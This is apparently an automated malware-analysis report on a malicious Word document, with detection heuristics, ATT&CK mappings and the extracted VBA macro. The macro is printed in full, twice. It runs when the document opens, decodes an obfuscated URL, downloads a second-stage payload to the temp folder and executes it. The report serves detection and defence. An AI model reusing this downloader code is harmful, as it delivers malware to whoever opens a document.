MALICIOUS
258
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1105 Ingress Tool Transfer
The sample contains VBA macros that utilize URLDownloadToFile to download a second-stage payload to the temporary directory. The ShellExecute API is then used to execute the downloaded file. The ClamAV detection 'Doc.Downloader.Donoff-6700491-0' further supports the downloader functionality. The decrypted URL 'ebpmoxpe@cpmc0103OL8cei70tfmjg020jqb0uu/fh00;quui' is highly suspicious.
Heuristics 8
-
ClamAV: Doc.Downloader.Donoff-6700491-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Donoff-6700491-0
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
"URLDownloadToFileA" (ByVal TgIcGfxJxuoGDbK As Long, ByVal UbW As String, _ -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
rEeeFNZCVBYrQ = Environ$("tmp") & "\" & qUhhwADuTjcLtwQtxLH -
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3018 bytes |
SHA-256: 4eba1d0fa2664a2e5ad04d80f626fe0f3dcb7c4215797bd87f8995b2409e81ff |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Macro Name: rCwOyUEPUQd
Private Declare PtrSafe Function hzwSoNSObetOP Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal DcFkT As Long, ByVal PEYPGTe As String, _
ByVal MMAmNkwKsJvzZNKEWUrMlrnz As String, ByVal CQnoxHCgvNiBvlQZ As String, ByVal bYeOHOtGFV As String, ByVal YcTtHAlSUpRWkuPdQCeAzb As Long) As Long
Private Declare PtrSafe Function loIypDNwwjkK Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal TgIcGfxJxuoGDbK As Long, ByVal UbW As String, _
ByVal jzAVXhEmPfLRltiOJJ As String, ByVal INyryd As Long, ByVal DpFIL As Long) As Long
Private Sub rCwOyUEPUQd()
Dim iDrAXSwyfyEMBhqrpuRX As String, qUhhwADuTjcLtwQtxLH As String, rEeeFNZCVBYrQ As String, uIQRbztWYFL As String, fndIDECHszG As String, WxxMDFxWze As String
qUhhwADuTjcLtwQtxLH = Decrypt("fyf/byy")
rEeeFNZCVBYrQ = Environ$("tmp") & "\" & qUhhwADuTjcLtwQtxLH
iDrAXSwyfyEMBhqrpuRX = Decrypt("ebpmoxpe@cpmc0103OL8cei70tfmjg020jqb0uu/fh00;quui")
loIypDNwwjkK 0, iDrAXSwyfyEMBhqrpuRX, rEeeFNZCVBYrQ, 0, 0
hzwSoNSObetOP 0, "open", rEeeFNZCVBYrQ, "", vbNullString, vbNormalFocus
End Sub
Private Sub Document_Open()
rCwOyUEPUQd
End Sub
Private Function Decrypt(enc)
Dim x, i, tmp
enc = StrReverse(enc)
For i = 1 To Len(enc)
x = Mid(enc, i, 1)
tmp = tmp & Chr(Asc(x) - 1)
Next
Decrypt = tmp
End Function
Attribute VB_Name = "NewMacros"
'Macro Name: rCwOyUEPUQd
Private Declare PtrSafe Function hzwSoNSObetOP Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal DcFkT As Long, ByVal PEYPGTe As String, _
ByVal MMAmNkwKsJvzZNKEWUrMlrnz As String, ByVal CQnoxHCgvNiBvlQZ As String, ByVal bYeOHOtGFV As String, ByVal YcTtHAlSUpRWkuPdQCeAzb As Long) As Long
Private Declare PtrSafe Function loIypDNwwjkK Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal TgIcGfxJxuoGDbK As Long, ByVal UbW As String, _
ByVal jzAVXhEmPfLRltiOJJ As String, ByVal INyryd As Long, ByVal DpFIL As Long) As Long
Private Sub rCwOyUEPUQd()
Dim iDrAXSwyfyEMBhqrpuRX As String, qUhhwADuTjcLtwQtxLH As String, rEeeFNZCVBYrQ As String, uIQRbztWYFL As String, fndIDECHszG As String, WxxMDFxWze As String
qUhhwADuTjcLtwQtxLH = Decrypt("fyf/byy")
rEeeFNZCVBYrQ = Environ$("tmp") & "\" & qUhhwADuTjcLtwQtxLH
iDrAXSwyfyEMBhqrpuRX = Decrypt("ebpmoxpe@cpmc0103OL8cei70tfmjg020jqb0uu/fh00;quui")
loIypDNwwjkK 0, iDrAXSwyfyEMBhqrpuRX, rEeeFNZCVBYrQ, 0, 0
hzwSoNSObetOP 0, "open", rEeeFNZCVBYrQ, "", vbNullString, vbNormalFocus
End Sub
Private Sub Document_Open()
rCwOyUEPUQd
End Sub
Private Function Decrypt(enc)
Dim x, i, tmp
enc = StrReverse(enc)
For i = 1 To Len(enc)
x = Mid(enc, i, 1)
tmp = tmp & Chr(Asc(x) - 1)
Next
Decrypt = tmp
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.